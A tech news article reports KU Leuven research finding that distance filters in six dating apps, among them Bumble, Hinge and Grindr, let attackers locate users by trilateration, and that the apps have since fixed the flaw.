Skip to content

6 popular dating apps are exposing accurate user locations

  • by
  • 3 min read

Vulnerabilities in six dating apps, including Bumble, Hinge, Badoo, Grindr, Happn, and Hily, could allow malicious users to pinpoint locations within two meters of their targets — a doxxing nightmare

Researchers from KU Leuven, a prominent Belgian university, scrutinised 15 well-known dating apps, uncovering flaws in some of them. While these apps do not explicitly share users’ precise locations, the researchers found that the ‘filters’ feature — used to refine search criteria by age, height, relationship, type, and distance — was exploiting exact coordinates.

The technique, dubbed ‘oracle trilateration’ by the researchers, builds on the principles of trilateration used in GPS technology. The process begins with the attacker roughly estimating the victim’s location based on the profile information.

The attacker gathers three precise distances by methodically adjusting the filters and observing when the victim is no longer within a certain proximity. These distances create intersecting circles that reveal the victim’s location.

“It was somewhat surprising that known issues were still present in these popular apps,” researcher Karel Dhondt told TechCrunch. Although the exact coordinates were not revealed, the precision of two meters is “close enough to pinpoint the user”.

The positive news is that all affected apps have since updated their distance filter functionalities to mitigate the risk. Rounding the coordinates to three decimal places reduces the precision, introducing an uncertainty of approximately one kilometre.

This modification significantly hampers the effectiveness of the oracle trilateration technique. Bumble addressed the vulnerability in 2023 while Hily and Hadoo collaborated with researchers to implement new geocoding algorithms, eliminating the flaw.

Grindr, another app scrutinised in the study, had a less severe vulnerability, limiting location accuracy to within 111 meters. While this is an improvement, it still poses potential risks, particularly in densely populated areas. The platform defended this feature as a necessary aspect of connecting its users within the LGBTQ+ community, emphasising control over location information.

“The apps’ privacy policies generally fail to inform users about these privacy threats and leave the burden of protecting personal (sensitive) data to the users,” the researchers concluded. “We hope that the awareness that we bring to these issues will lead LBD providers to reconsider their data gathering practices, protect their APIs from a data leak, prevent location inference, and give users control of their data and therefore ultimately their privacy.”

In the News: Mandrake spyware returns to Android’s Play Store after two years

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me

>